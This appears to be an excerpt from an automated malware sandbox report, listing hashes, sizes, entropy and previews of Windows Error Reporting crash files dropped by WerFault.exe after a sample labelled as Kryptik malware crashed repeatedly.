                                                            MD5:F93C23B79F14AFABB289298306EA563E
                                                            SHA1:8FCF1F2908246045395CC558B7A35CE2D5E42C47
                                                            SHA-256:2253C4B982143456A0E470F9B85D13C70C5984F34476FE6EB8231599DD6F7212
                                                            SHA-512:EC5A9ADD1FC2A01EE540C8FD2974ACCD60F8227DC4CD6E4885CD09BC0ADF3D5C437428A4BB71D963DC1F917E3CE22169017D8023D8536B2690AA47B1E6E4B753
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.874241010281355
                                                            Encrypted:false
                                                            SSDEEP:96:n/m/wdzmOGkmeHsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTf3K:Hd7GoHHY056rgjuizuiFKZ24IO8a
                                                            MD5:659BF0624083C4A1B22A320EC76929E0
                                                            SHA1:CB1B3911CEF94C208C3EB72D27101425D162385E
                                                            SHA-256:952C21E7DB5C8354A4D521986C858DDBE89BB776C22121B419449C8133125A55
                                                            SHA-512:392A918F69719F11F0265C7C8D97F08CA1F73860E8547BEDBEDAFF96396644D841D5283CF6293BB552EAD2473EB2DA932361AB168F5E8C5D641D09DEE0B1D9E3
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.0221245844257116
                                                            Encrypted:false
                                                            SSDEEP:192:f2d7GoWHHU07cqbdjuQ90zuiFUZ24IO8n:OdSoWHHP7JbdjqzuiFUY4IO8n
                                                            MD5:BF5E6B0B6E3643A9D170F69666BE00F6
                                                            SHA1:6BF992BA1A647A2167568B342979300457A7DAE2
                                                            SHA-256:97EEB6526C254A142BDA2E050894ABBF623B107ECC29D65F8FD16C424DE1DBE5
                                                            SHA-512:FF2AC5E9B6A78B416233B39DFF95F6DC1505FCF418A6F09B7EE24D343E0B81D67F1471F64BB9A187744C93602FE7832EB1ED0633ADE2B64A8E0261242956D774
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.0215340124938246
                                                            Encrypted:false
                                                            SSDEEP:192:HQkd7GolHHj0wS+tU8juQ90zuiFlZ24IO8a:wkdSolHHQ3SU8jqzuiFlY4IO8a
                                                            MD5:BE97CA387AA917A4DB0B1FAA44A26F34
                                                            SHA1:E90FEF6D8AEECBFF8E44DECB829E63E7641B1406
                                                            SHA-256:513BE98FA813DB77A8A8D41BC248227736455D9832E32FB732D5ED8CF0108D74
                                                            SHA-512:FAC0AB2F58AA0D25A79F1848E9F85F0D0A2A8EECA222B2F4F23E1347D3F519549CEFB157DB315CAB7B8FB3CF939D54F83C4074EB8A0261DE20D8592130FAF943
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.0195080852229206
                                                            Encrypted:false
                                                            SSDEEP:192:QLd7GoGSH90wS+tU8juQ90zuiFlZ24IO8n:GdSoGSH+3SU8jqzuiFlY4IO8n
                                                            MD5:96B90AA9AC14E1A88AFA15DFD6E56BAC
                                                            SHA1:881F728186E372EF69B287D83C6AC6399041F178
                                                            SHA-256:39A83F49A2A9C5B8C593CBBC2F55A17FF3610642BCF71610DB2A8F978315DC60
                                                            SHA-512:63065A998CB8E0CB2D237FC56D3A1625BA27480C058D23EE4E88380869C957AC5E41E48208F751CDFCC7948F52063E36FA77F45FC19C4B12C4D32C77F13B8985
                                                            Malicious:false
                                                             Preview:Version=1..EventType=APPCRASH..EventTime=133728485265177527..ReportType=2..Consent=1..UploadTime=133728485269708961..ReportStatus=655456..ReportIdentifier=00c911f6-5e77-4bda-a691-ffd6c73862b1..IntegratorReportIdentifier=d9a60224-ca3f-4caa-ac61-13969c8fc27d..Wow64Host=34404..Wow64Guest=332..NsAppName=SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe..AppSessionGuid=00000c50-0001-0014-a4ab-da2f5919db01..TargetAppId=W:0006c2aa2424b3bfa1fc2c492b299e01e5bb0000ffff!000058ba4506cdb786fc0b1
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:03 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):59350
                                                            Entropy (8bit):2.1240495433003503
                                                            Encrypted:false
                                                            SSDEEP:384:tRD2jmzvIrGNfbgZswHmqCFQeZGNl45le8rKb:tl/zvIrGNSfqFQ8GM2
                                                            MD5:6FCA096BEC17A0A898FD4E865FCB9A27
                                                            SHA1:1F15B628BDB9AE5AA7154A90748E09FB84CFA823
                                                            SHA-256:177CB786C0CEDBCE17C50937B6DF6EFFC65402BFEA1DC5FCD430A53C5E880F10
                                                            SHA-512:9A4452F6E5D335890C570D0174E53B6155BA66A17FE850A3B5DF527197840C296C84A222E14E78FB477B53C951C9AE8786371BACBD7ADB37FD38B47ADA586132
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8604
                                                            Entropy (8bit):3.708586930364453
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwN6i6Y9aSU9fyKgmf6lpBQ89bLhsfzZm:R6lXJ66i6YgSU9f3gmf6nLafA
                                                            MD5:9677335C4ACA3F972E9B7A142FBB37AF
                                                            SHA1:A8FB5F2C245C1859F19D00860E6E31CBB99A95B1
                                                            SHA-256:3B1B6EC3845D90E757AD207E9FC640D823531E82B6C3DF43FBAB1A0DBED4907B
                                                            SHA-512:8AD2F12F0ADC49BF5FDCFFB469CFCA68F8B59BA487DD48F09DD5BA6DED588CB3E5CC8C8F24755DE3A341C34E8EBA5DB4431D8A31A0C8EB8D49316025ED8ED70A
                                                            Malicious:false
                                                             Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.591182753455992
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYrZYm8M4Jmf/JFNx+q8vD/bFjyIOIAd:uIjfKI7mC7V9JaxKvVFhAd
                                                            MD5:C265B42442953BA4D50A22AE09ABA489
                                                            SHA1:E63394A6373FFE865D6456CBECED4FDAA87AB3A3
                                                            SHA-256:28DA60B25776CF42A61DD70B8365787789DFC691AD179535A05C5671F8257675
                                                            SHA-512:3E2C395314DF45E34136411104655DF0E42CC4719F9D85AB35DDB636CF4EE5135517CCF81E15F6F6BDCC05921C99B55C8E67EA63DCBECD7C65EF3B1188A7C655
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:04 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):59242
                                                            Entropy (8bit):2.1518642184241514
                                                            Encrypted:false
                                                            SSDEEP:384:2D2jm1SivxigfogrsJizCFQeZGNl45le+PkC5G:S/MivxigD9eFQ8GMRG
                                                            MD5:EB206569CF2E02266A6376C40F207798
                                                            SHA1:7FC3FA57F7D543E7BE3F18B7E74EB492FAB8A242
                                                            SHA-256:02064B8B8C6CD5E97D4101C91677DA59C2234FC040C0606A66DC46465D12E532
                                                            SHA-512:ABC352CA554428E7DE9A0DCC48B60E75D66F8EBF71A525EBFE34EC09CA9FA997FA89DF5344749E00DC8A68C7D32A480DBCBDD144643619EA7034FB890DD3185B
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.706475764970843
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJw66w6Y9HSU9fyKgmf6lpBM89bLhsfVZm:R6lXJN6w6YtSU9f3gmf6jLafC
                                                            MD5:9B7042B87D5E87E1E6487B6E85DAC991
                                                            SHA1:F4CD31F0DD9B2D7B859C639CB6500D4DEB961394
                                                            SHA-256:820A4B2620D6029DD594C1AF15719CEE488A79E4E66A95CF86E361C1960FE416
                                                            SHA-512:B67B1F0FE8351183DFB610521E95109AE2DE65CE24DA1DFB82C95443C30BDCFD7C54861036695769609788611AB7CDB0A4DF7DF63D99F5BCAFFB9D1C031296A2
                                                            Malicious:false
                                                             Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.59178679706321
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYcYm8M4Jmf/JFi+q8vD/bFjyIOIAd:uIjfKI7mC7VcJ1KvVFhAd
                                                            MD5:AD0EC331E6C2650DB81C4A70B65FF9C1
                                                            SHA1:BE3C7DEF3F9B688DC44CCAC78FA54D963F5E6BAA
                                                            SHA-256:3561330655D0065BBB2D6CD8AB4FD752C339F0C26DCB09F4E18489F3A5FA485A
                                                            SHA-512:783A6423DBC210E684072ED83163511335F29EE8084A246C52AC90C9D93D71A384F5E40D7A7C19243D9E894A5AC435B232CE8D8ED5B66B16790382FB8982722D
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:05 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):68894
                                                            Entropy (8bit):1.903620056146761
                                                            Encrypted:false
                                                            SSDEEP:192:yX48C8PBOCoFZjscmQGyMgQRHeEpPj8MNm+1SLs8leIYUgwOENq7Nc:k4/8P0vnscmQMgwJNl45leIgdi
                                                            MD5:CCAB208432405DB4C584C5FC8624BEA1
                                                            SHA1:EA2021A73C0CCF0C4D17EE1738472290F072DD22
                                                            SHA-256:094E23BF49654A1ED1B827C75B9D3E5A50148329FA091BE7AB795B9AA51DFD2B
                                                            SHA-512:219C5DFCC472E955E91797F62B555726C4BC21E8BA455D79D9A2922F31304BFB8A212AB1EE4AF7AFD0D9CB4CB9F0EF6185DD14B71E7B6614070D625F9C9EC546
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.706167521049113
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwI6wQ6Y9nSU9OAgmf6lpBy89bChsfIWm:R6lXJf6wQ6YdSU9OAgmf6BCafQ
                                                            MD5:97ECF618DA545F7E649A123FE0FC5057
                                                            SHA1:E0B1CD3543D951A83287506480650B8E5C31BF4F
                                                            SHA-256:80DC51B2D3D5A9437EFC3E94FAE8F1A94FDCD3B69C7F5E7C4C773AE0EEF4D59D
                                                            SHA-512:DC69E1BC11EB95D85F0CCD9D982582D9FBC15E9562974DFF696EDFD4392F044B118AC5A47CD0CC9E23FCABEBFEECB024FC16CBF80AF9D1FE8781B032B22DDEFF
                                                            Malicious:false
                                                             Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.593168921311553
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYL05Ym8M4Jmf/JF2Vg+q8vD/bFjyIOIAd:uIjfKI7mC7VMJtuKvVFhAd
                                                            MD5:3455F46D27768B91898A184CC61A1473
                                                            SHA1:845FF1101B397577B78821E28D22EFBB88E6BEB4
                                                            SHA-256:C48748576859159151D8B5DA970ADBCBC5223977A93FE279A2ECFD2D38ABF465
                                                            SHA-512:6ADA15729DD11D374BF8B2D780C280296134838CB12BE97093773D68FDC914296805C390D770E4630271F9BE6617034A0CC45FCEC01751983278CC8928744B8A
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:06 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):68470
                                                            Entropy (8bit):1.9196966841812042
                                                            Encrypted:false
                                                            SSDEEP:192:9X8C8PPIKzOCoBHHuzegxGyMgFKgeEpPjxWsOGmXMNm+1SLs8leIYzuvR0pno8q:h/8PPFqvtstMgREsOjcNl45lefuvIXq
                                                            MD5:B0E560231A5A6ECBED347CBE38C06ABC
                                                            SHA1:32ABF616B4C73D91911FDA219E1DD28778FBB773
                                                            SHA-256:7DEE90A327F24392B3B57A6512499847405429D949BF4AB23694903309390B47
                                                            SHA-512:A97287975947A01816C4A661E5213F94835C2F6AF1E1340B4AD081F0B7BA26AC721B1ACB1C66A7E03BA12968481045567C9B4B5B96A56EDA01DAE8238999AD75
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.7076502399497455
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJws6wAW6Y9DSU9HAgmf6lpBx89bZhsfIzm:R6lXJr6wJ6YpSU9HAgmf6EZafR
                                                            MD5:98B0244DB04A24CCCFA512E55AECD79D
                                                            SHA1:E87BB0D82C7671A6314A4E95EC8916366F7A4F86
                                                            SHA-256:A334EDCCBAA0F731DC46E41C2B256E67609D6B4782E8C6518974BD081AAE59BF
                                                            SHA-512:BFF051245A4E61E3FB34953F0611BA7E2CEB01FB6E94D09BFD25D3FD962AA1586AC1E8B944DFECC0E7735B2014AC3C74C4D60452C6CE6A7E74A0E1990B289C43
                                                            Malicious:false
                                                             Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.591829272365948
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYdYm8M4Jmf/JFU+q8vD/bFjyIOIAd:uIjfKI7mC7VhJPKvVFhAd
                                                            MD5:1A75BACE79CF7C5717AAB25E7C878654
                                                            SHA1:E67DDABB0084A18142715970712378FACD8399C4
                                                            SHA-256:D83D38EB7200DE5BDF383295BA3FD5C06B7F637DA2B61A96D6A157D1909A07E6
                                                            SHA-512:F59F902CCAD1D8AF2372A77CA489EABADE85F7ECF479A92AD6BC7B4DB0B0FBF7D7D89FEFD8304C7CF594B416E60359580FF5FABD4D95E9F88DFFE38581AA1E98
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:07 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):75690
                                                            Entropy (8bit):1.8798343028574518
                                                            Encrypted:false
                                                            SSDEEP:192:Ing5faUzLIOCoPzQzegxGyugdsvmNsZKEeEpPjK7HyH1+1SLs8leIYtLw45/jq/s:MgVaUXvPOtugdsvm2Gh45letwqGd0p
                                                            MD5:D2C8D8E28EFA2605993453FC88E01A3B
                                                            SHA1:073A45134BE02B471B295369629C31542358769A
                                                            SHA-256:DE29C0FE8E014D95B2BF2B39BDED27DC149138B542A56D03A83EC964AE099AC1
                                                            SHA-512:D86BB040E3007DCE77F4FCE9157DAACD1328183CDCEDA43189DC9DC1AD5306E4F37B68AAD346B4DECCB7942CFFE39382FA57E4E9213729E567071FE16582B449
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.7066637191177354
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwk6u6Y9LSU9HAgmf6lpBa89bqbhsfTEjm:R6lXJT6u6YhSU9HAgmf6pqbafw6
                                                            MD5:EA6CA5F26F837E0291C47B4CEA1F862F
                                                            SHA1:2C36A7336F4BBA1EB6B452C3D0AFF0E32772BB5B
                                                            SHA-256:55C08A74807D73659497FCBA87E5E49B2B2956D2FBAA068FD5C400AF323642DA
                                                            SHA-512:C6C7830CB2FCFF38F59C7091FECE9AE24569B3D46675914435136B179DDC6965F80A3645B802C47B8DF17B8EDAD84BE9C9A036657D3F4A187ACD3B5002D68F14
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.590991764493244
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VY60Ym8M4Jmf/JFy+q8vD/bFjyIOIAd:uIjfKI7mC7VTBJ9KvVFhAd
                                                            MD5:83519463147326160E17650043766DAA
                                                            SHA1:A3ED6B0D532319A97CA17E6B3AF944EDA3694A0B
                                                            SHA-256:0DCE2439799469D9D86CF7E3EDEE5942A13072BB66F16BEA200CA7D3A4732585
                                                            SHA-512:B1F5863918C35126FCE94BC3C1AE385F427726E5D5C98713222C2FC8C464A3085C244FA85A5474D64200C7B86675B2CA376BA844376051F8C6D2062AA5A7ED37
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:07 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):88394
                                                            Entropy (8bit):2.0136232962211347
                                                            Encrypted:false
                                                            SSDEEP:384:Nhku4uYYbvl8i9sCL7uTLMrsSdX45leQ7HssrynKco68:7PzYwvl8i95CvSC8smK
                                                            MD5:86E605C3E93B5C14E03F691ADFE755BD
                                                            SHA1:A34B67EE4902CDB1EF03B5855F8C62E351866025
                                                            SHA-256:6D580CE1560B02F6CFC778B10DA31F24026B4D84280B7B845B19BA1327956C49
                                                            SHA-512:02E9D76ACDF77329BB4BD8EE1A00295C4C9257438D70B518D5361C20DFA1436A50BB7D34BE2FA321DD25D9D08212DFC53F413B3888FC4A3C8A91EF5EF295A64C
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.707161061296225
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJww6V6Y99SU9H2gmf6lpBB89bqbhsf+Ejm:R6lXJX6V6YXSU9H2gmf60qbafZ6
                                                            MD5:C3E5C0C07B42A7D3D0691ABD008F6CEA
                                                            SHA1:09D3EF130315A3771B52AB7374A3237621D3B372
                                                            SHA-256:DB5C07936C912FFD0796E243B10CACA99F74807AF4A9A31138331E1EE6291B0B
                                                            SHA-512:EC2C0058E2319E01E22CA6FB3C9F548E23A8E1E9FD385A27D7C50599E04D3AE100D2688614487D4B467E85DE2BE4BF65F3719651726F7B126B63B8C0929C46E6
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.591505303901703
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VY5Ym8M4Jmf/JFzDX+q8vD/bFjyIOIAd:uIjfKI7mC7VtJuDXKvVFhAd
                                                            MD5:367FC9DA590307DDC999DF262A12349B
                                                            SHA1:B7170EDAF7915764C413AAF46C7BEA41389AB65D
                                                            SHA-256:755378B15809B86CAC07CE963EA587D895CFFBA4F5151943CD691C2D551846BC
                                                            SHA-512:ABC9705799A65F8B32467DE7E90FEA0736EC5E90BC138F99CB663897D2965056C1FCE3FA65728E7E7E19577FDE80CFD40481570D3798685F4084EE7C7988505B
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:45 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):46228
                                                            Entropy (8bit):2.48674268037572
                                                            Encrypted:false
                                                            SSDEEP:192:alfkjIA77bcxVXep+N8OCo+QzUyBnD5Ki58C0K2m2ZyifSAMjcoq6gLxA:2MMA77Iip+Nzv+QzUyBo827ME4Xe
                                                            MD5:16A588E5032932986AD4CA2F501BCB6E
                                                            SHA1:4B80E470399CF598A162A81A92144AFD128707AD
                                                            SHA-256:E6F01BFF6A46A3E8856D4A815A46BF447D07A901C6DB6A7CB32D5290BBD4ADD6
                                                            SHA-512:2A697ABED06776D4D88AE831FF42793066016E4E8AAFC7459BC75EB2093C081D58FBB8DCF9AFA0B11C2C4B8170D20BDCDA49479CB39098856B905B2F055CB61A
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
